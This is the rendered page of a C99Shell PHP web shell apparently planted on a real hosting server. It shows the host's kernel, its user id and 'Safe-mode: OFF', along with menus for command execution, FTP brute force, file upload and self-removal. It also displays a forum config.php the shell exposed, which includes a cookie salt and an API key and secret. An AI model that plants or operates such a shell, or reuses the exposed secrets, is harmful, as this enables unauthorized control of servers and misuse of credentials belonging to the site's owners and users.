!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/carbon/   drwxr-xr-x
Free 293.55 GB of 429.69 GB (68.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (1.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// set automatically the time zone
date_default_timezone_set('Asia/Shanghai');

define('DEBUG_MODE'false);

// Salt for Cookie and Form
// Free to modify
define('SALT''AuthorIsLinCanbin');
define('PREFIX''carbon_');
define('InternalAccess'true);
/*模板文件使用
if (!defined('InternalAccess')) exit('error: 403 Access Denied');
来防止模板文件被游客访问
*/
define('ForumLanguage''en');
//MemCache(d) / Redis
define('EnableMemcache'false);
define('MemCacheHost''localhost');
define('MemCachePort'11211);//Memcache: 11211, Redis: 6379
define('MemCachePrefix''carbon_');
//Database
define('DBHost''[[softdbhost]]');
define('DBPort''3306');
define('DBName''[[softdb]]');
define('DBUser''[[softdbuser]]');
define('DBPassword''[[softdbpass]]');
//Sphinx Server
define('SearchServer''');
define('SearchPort''');

define('LanguagePath'__DIR__ '/language/' ForumLanguage '/');
define('LibraryPath'__DIR__ '/library/');
define('ServicePath'__DIR__ '/service/');

// API checking data
// List<Map<String APIKey, String APISecret>>
// Free to modify
$APISignature = array();
$APISignature['12450'] = 'b40484df0ad979d8ba7708d24c301c38';

if (
DEBUG_MODE) {
    
//Enable error report
    
error_reporting(E_ALL); 
    
ini_set('display_errors''On');
} else {
    
//Disable error report
    
ini_set('display_errors''Off');
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0031 ]--